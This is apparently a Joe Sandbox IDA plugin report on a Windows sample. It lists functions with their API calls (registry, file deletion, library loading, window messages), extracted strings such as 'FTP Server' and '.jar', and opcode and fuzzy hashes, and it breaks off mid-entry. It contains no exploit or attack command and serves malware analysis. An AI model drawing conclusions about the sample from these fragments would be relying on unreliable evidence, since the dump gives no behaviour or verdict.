                                                      • Part of subcall function 0035A850: RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$AllocateHeapObjectSingleWait
                                                    • String ID: *.*$.jar$.pack
                                                    • API String ID: 2019434529-3892993289
                                                    • Opcode ID: 18fb8ae3ee7fe0153b2d0a317cef919db538a76bd4a4e38d9baf159d6762eadb
                                                    • Instruction ID: e2f32cca379cd693555ebad87e3c71cd634045dc9b6a3731c8426050db9ea06a
                                                    • Opcode Fuzzy Hash: 18fb8ae3ee7fe0153b2d0a317cef919db538a76bd4a4e38d9baf159d6762eadb
                                                    • Instruction Fuzzy Hash: C5516270A016169FDB10DFA9C848BAFF7B4FF44315F14426AE425A7391DB38E905CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    • GetLastError.KERNEL32(?,00000000,FTP Server,0000000A), ref: 004A5B34
                                                    • WaitForSingleObject.KERNEL32(?,0000000A,?,00000000,FTP Server,0000000A), ref: 004A5B6D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer$ErrorHeapLastObjectProcessSingleWait
                                                    • String ID: REST %u$mT
                                                    • API String ID: 1670056567-277687540
                                                    • Opcode ID: cb8416252cdef2e4eb898d04be4220be4c94c33f2cc78372432a0d157df622d8
                                                    • Instruction ID: 116c2469510935b80e6c2b360b00bd64200c534939f013e7f0be3849280ee66f
                                                    • Opcode Fuzzy Hash: cb8416252cdef2e4eb898d04be4220be4c94c33f2cc78372432a0d157df622d8
                                                    • Instruction Fuzzy Hash: FE51E271600B04AFD720CF68CD48B2AB7E5FF62325F14462AE4168B7A1DB78F804CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • DeleteFileW.KERNEL32(?,00000000,?,\\?\,00000004,?,?,?,00000000,005848ED,000000FF,?,80004005,D13B3340,?), ref: 0046C783
                                                      • Part of subcall function 0035A140: FindResourceW.KERNEL32(00000000,?,00000006,?,?,000000A0,80070057,8007000E,80004005,00371A24,00000000,?,?,?,*.*), ref: 0035A163
                                                    • DeleteFileW.KERNEL32(?,D13B3340,?,76B7F9C0,?,00000000,005848ED,000000FF,?,0046C527), ref: 0046C7B2
                                                    • GetLastError.KERNEL32(?,?,?,00000000,005848ED,000000FF,?,80004005,D13B3340,?,?,?,?,005848ED,000000FF), ref: 0046C7C2
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DeleteFileInit_thread_footer$ErrorFindHeapLastProcessResource
                                                    • String ID: \\?\
                                                    • API String ID: 1908169709-4282027825
                                                    • Opcode ID: 4b6d8e8d36d7a9f00fe9e540266c83198df41e9b05c97a3367c82484c1008b2b
                                                    • Instruction ID: 2fabe3c4df18197d014b0be37be0876f26e50213703ac8fb416b6a3967230968
                                                    • Opcode Fuzzy Hash: 4b6d8e8d36d7a9f00fe9e540266c83198df41e9b05c97a3367c82484c1008b2b
                                                    • Instruction Fuzzy Hash: 88219175900615DFD710DF68C848B7AB7F4FF05322F10465AE8A1D7390EB3999049F95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryW.KERNEL32(combase.dll,RoOriginateLanguageException), ref: 00360652
                                                    • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00360658
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RoOriginateLanguageException$combase.dll
                                                    • API String ID: 2574300362-3996158991
                                                    • Opcode ID: 9e25eaa05497011f806337851e61599cb0b5015a664ef45fe9b9275082746248
                                                    • Instruction ID: 37ffa732b2d20e77008c5cd2be27fd1aef1973255737e0d353fa8ac7628db8fb
                                                    • Opcode Fuzzy Hash: 9e25eaa05497011f806337851e61599cb0b5015a664ef45fe9b9275082746248
                                                    • Instruction Fuzzy Hash: A7317C71904249AFDB25DF68C906BEEBBF4FF04314F10862AE825A72D0EB745A44CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • IsWindow.USER32(00000004), ref: 0040F16A
                                                    • DestroyWindow.USER32(00000004,?,?,?,?,?,?,?,?,000000FF), ref: 0040F177
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Window$Destroy
                                                    • String ID: T$\$|$\
                                                    • API String ID: 3707531092-3399885332
                                                    • Opcode ID: 9389c3a9bff2cf8ce7e7cb80b0d44be020755a3f203b2138ec1fa1d7e2d7ebaa
                                                    • Instruction ID: 07991acb120de43396aac1e77495314fba13c718cca5540311ac17d1068ea3f4
                                                    • Opcode Fuzzy Hash: 9389c3a9bff2cf8ce7e7cb80b0d44be020755a3f203b2138ec1fa1d7e2d7ebaa
                                                    • Instruction Fuzzy Hash: CB319A70804689EFCB15DF68C904B8EFBF4FF14314F1086ADD455AB691CBB4AA08CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Cnd_broadcastCurrentMtx_unlockThread
                                                    • String ID: xc
                                                    • API String ID: 2021000804-3614201728
                                                    • Opcode ID: f0d9f1ac06488f17d879ae10f61660f7bab0ff0819b7e16a0af23850ac55ccb3
                                                    • Instruction ID: f295b0b61a0f4b3d7162d327b6f75a7fe38e162b7e5e91e7d61fb2325ceec202
                                                    • Opcode Fuzzy Hash: f0d9f1ac06488f17d879ae10f61660f7bab0ff0819b7e16a0af23850ac55ccb3
                                                    • Instruction Fuzzy Hash: 3901BC35604703ABFB21AF69C855AEABBB5FF80351F110438E41697240DB71EC80CBB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00524BBD,?,?,00000000,?,?,?,00524CE7,00000002,FlsGetValue,005A9F08,FlsGetValue), ref: 00524C19
                                                    • GetLastError.KERNEL32(?,00524BBD,?,?,00000000,?,?,?,00524CE7,00000002,FlsGetValue,005A9F08,FlsGetValue,?,?,00521B04), ref: 00524C23
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00524C4B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad$ErrorLast
                                                    • String ID: api-ms-
                                                    • API String ID: 3177248105-2084034818
                                                    • Opcode ID: e74db0ee1a9d51235be7996f7e172b0211827d4945aba3d8d94200d600632594
                                                    • Instruction ID: 9870738645d72b1ac9fc03376430693e1a3ba3d6a35565d5e666b390dd9807eb
                                                    • Opcode Fuzzy Hash: e74db0ee1a9d51235be7996f7e172b0211827d4945aba3d8d94200d600632594
                                                    • Instruction Fuzzy Hash: E1E04830240254B7EF101B55FC0EBAD3F59BF12B95F144020FA0CB40F5EBB19D58AA45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 00376F78
                                                    • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 00376F8D
                                                      • Part of subcall function 0035A850: RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                      • Part of subcall function 0044BAD0: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,?,?,?,000000EF,?,00376FC8,00000000,80004005), ref: 0044BB38
                                                      • Part of subcall function 0044BAD0: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0044BB68
                                                    • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 003770C3
                                                    • SendMessageW.USER32(?,00001061,00000000,00000005), ref: 003771BF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$AllocateHeapWindow
                                                    • String ID:
                                                    • API String ID: 3168177373-0
                                                    • Opcode ID: 1b5c6a8bb6254998a62b5388cd8425c5655d7459b8c9f01d5fa5c3286d358950
                                                    • Instruction ID: 1d4ae3b4708a6ab41a8d7f56cb103ba367892ad2a5f98c1c4f74c5450a31dc6e
                                                    • Opcode Fuzzy Hash: 1b5c6a8bb6254998a62b5388cd8425c5655d7459b8c9f01d5fa5c3286d358950
                                                    • Instruction Fuzzy Hash: 7FC1B171A00609DFDB19DFA8CC99BEEFBB5FF48314F104219E415AB291DB74A944CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SendMessageW.USER32(00000001,0000110A,00000004,?), ref: 00380645
                                                    • SendMessageW.USER32(00000001,0000110A,00000001,00000000), ref: 00380677
                                                    • SendMessageW.USER32(?,0000110A,00000004,?), ref: 003807EE
                                                    • SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 00380816
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 2db08f6ae0459db61ae090422efe500d7e7866364bd10d209f24210f906d9d98
                                                    • Instruction ID: db476b5032985bc1f8d336f5677a79cbc99097fa68585317d9818cafb1bc3770
                                                    • Opcode Fuzzy Hash: 2db08f6ae0459db61ae090422efe500d7e7866364bd10d209f24210f906d9d98
                                                    • Instruction Fuzzy Hash: E3916071A01304AFDB6AEF64D880AEEB7F5FF48310F0545A9F445AB291D770A949CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetShortPathNameW.KERNEL32 ref: 00483BB0
                                                    • GetShortPathNameW.KERNEL32 ref: 00483C1E
                                                    • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,00000000,00000000,?), ref: 00483C6E
                                                    • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,-00000001,00000000,00000000), ref: 00483CA4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiNamePathShortWide
                                                    • String ID:
                                                    • API String ID: 3379522384-0
                                                    • Opcode ID: bd5aabc3ccfdd004a04b82ac0d7ccbd2863fe1b4ebd8660554f1ea206029f883
                                                    • Instruction ID: 7f86e5c5c0e649aaa05ee51c9de9b68b3f963e96a55c462dccc0f4a11f292656
                                                    • Opcode Fuzzy Hash: bd5aabc3ccfdd004a04b82ac0d7ccbd2863fe1b4ebd8660554f1ea206029f883
                                                    • Instruction Fuzzy Hash: B651BC71600605AFD714EF68DC49F2EFBF5FF80B21F108A6DE911AB290DB35A9008B54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegCloseKey.ADVAPI32(00000000,D13B3340), ref: 0049D686
                                                    • _wcsrchr.LIBVCRUNTIME ref: 0049D6B0
                                                    • RegQueryValueExW.ADVAPI32(00000000,D13B3340,00000000,00000000,00000000,00000000,D13B3340,00000001,?,00000000,00000000), ref: 0049D733
                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0049D77F
                                                      • Part of subcall function 0049D530: RegOpenKeyExW.ADVAPI32(00000000,D13B3340,00000000,00020019,00000002,D13B3340,00000001,00000010,00000002,0049C85C,D13B3340,00000000,00000000), ref: 0049D5CC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Close$OpenQueryValue_wcsrchr
                                                    • String ID:
                                                    • API String ID: 213811329-0
                                                    • Opcode ID: 3455896e0d359e34675ac1ef1d8ecf7f9a2c2d154765430ee20f41d5e22adcbd
                                                    • Instruction ID: 6f94a57731fab9be3cb8f51d6b6e0d884d6fcba1f1935b5d166bc2b19dc7748c
                                                    • Opcode Fuzzy Hash: 3455896e0d359e34675ac1ef1d8ecf7f9a2c2d154765430ee20f41d5e22adcbd
                                                    • Instruction Fuzzy Hash: 7C51DF72D01349AFDB10CFA8D944B9EBFB5EF41324F14826AE825973C1D7799A00CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNEL32(?,D13B3340,?,?,?), ref: 00484D6A
                                                    • CloseHandle.KERNEL32(?,D13B3340,?,?,?), ref: 00484D8A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID: <3[$<3[
                                                    • API String ID: 2962429428-896619088
                                                    • Opcode ID: 58b96b5a4a522fadd71d8bc1c7b1be355862597188be26c0b7072444280ce700
                                                    • Instruction ID: 6e7ee9e74be358a6c585d5b8084db56b3fd4bc52794e701d66e2bac6921ac05b
                                                    • Opcode Fuzzy Hash: 58b96b5a4a522fadd71d8bc1c7b1be355862597188be26c0b7072444280ce700
                                                    • Instruction Fuzzy Hash: 69512630901A85CFE711CF68C948B4AFBF5FF89314F1486A9D445DB3A1EB74AA05CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • FindResourceW.KERNEL32(00000000,?,00000017,D13B3340,?,00639310,?,?,?,?,00000000,Function_00223FBD,000000FF,?,?,00639310), ref: 004002C9
                                                    • LoadResource.KERNEL32(00000000,00000000,?,00639310,?,?,?,?,00000000,Function_00223FBD,000000FF,?,?,00639310,?), ref: 004002D8
                                                    • LockResource.KERNEL32(00000000,?,00639310,?,?,?,?,00000000,Function_00223FBD,000000FF,?,?,00639310,?), ref: 004002E3
                                                    • SizeofResource.KERNEL32(00000000,?,?,00639310,?,?,?,?,00000000,Function_00223FBD,000000FF,?,?,00639310,?), ref: 004002F4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Resource$FindLoadLockSizeof
                                                    • String ID:
                                                    • API String ID: 3473537107-0
                                                    • Opcode ID: af2f7fd31542adf59d3b901bfb1f8ab6ea5f6a0aaebe681cf3bff3f5c14bb4f1
                                                    • Instruction ID: 9a4cb911ccfa619eb596c219303a9093eb645be84627f4e64bf1dfbd35c6c61e
                                                    • Opcode Fuzzy Hash: af2f7fd31542adf59d3b901bfb1f8ab6ea5f6a0aaebe681cf3bff3f5c14bb4f1
                                                    • Instruction Fuzzy Hash: F431C071E056059BD7219F34DD05BBBBBB8FB44710F10823AEC15A72C0EF34AA0897A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetWindowLongW.USER32(?,000000FC,00000000), ref: 0036F169
                                                    • GetParent.USER32(?), ref: 0036F19D
                                                      • Part of subcall function 0051FA13: GetProcessHeap.KERNEL32(00000008,00000008,00000000,00495F3E,?,?,?,?,?,?), ref: 0051FA18
                                                      • Part of subcall function 0051FA13: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?), ref: 0051FA1F
                                                    • SetWindowLongW.USER32(?,000000EB), ref: 0036F1D0
                                                    • ShowWindow.USER32(?,00000000), ref: 0036F1E6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Window$HeapLong$AllocParentProcessShow
                                                    • String ID:
                                                    • API String ID: 78937335-0
                                                    • Opcode ID: 4719ea1cf0b64adbdd89d5b71d078336392a3280a63fb65c6b9223cd72613d99
                                                    • Instruction ID: 8aa46c53b570c9335138feb828310a5f630af4b2d859e93a934f8f3dc678f3db
                                                    • Opcode Fuzzy Hash: 4719ea1cf0b64adbdd89d5b71d078336392a3280a63fb65c6b9223cd72613d99
                                                    • Instruction Fuzzy Hash: F32182706047029FD721DF29E80896BBBE9FF85754B414A2DF456C2662DB30F844CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ResetEvent.KERNEL32(?,?,?,004A4DC2,?,?,?,?,?,00000003,00000000,D13B3340,00000000), ref: 004A59A2
                                                    • GetLastError.KERNEL32(?,?,?,004A4DC2,?,?,?,?,?,00000003,00000000,D13B3340,00000000), ref: 004A59CF
                                                    • WaitForSingleObject.KERNEL32(?,0000000A,?,?,?,004A4DC2,?,?,?,?,?,00000003,00000000,D13B3340,00000000), ref: 004A5A05
                                                    • SetEvent.KERNEL32(?,?,?,?,004A4DC2,?,?,?,?,?,00000003,00000000,D13B3340,00000000), ref: 004A5A28
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Event$ErrorLastObjectResetSingleWait
                                                    • String ID:
                                                    • API String ID: 708712559-0
                                                    • Opcode ID: b3558ccd96e3258de81afc88d922231016bd7a00bd2f69be2f5444d61d6baa05
                                                    • Instruction ID: f2841c307b7727de2148a8d8aa7511072965f8522a0379794db1144e8f8a067e
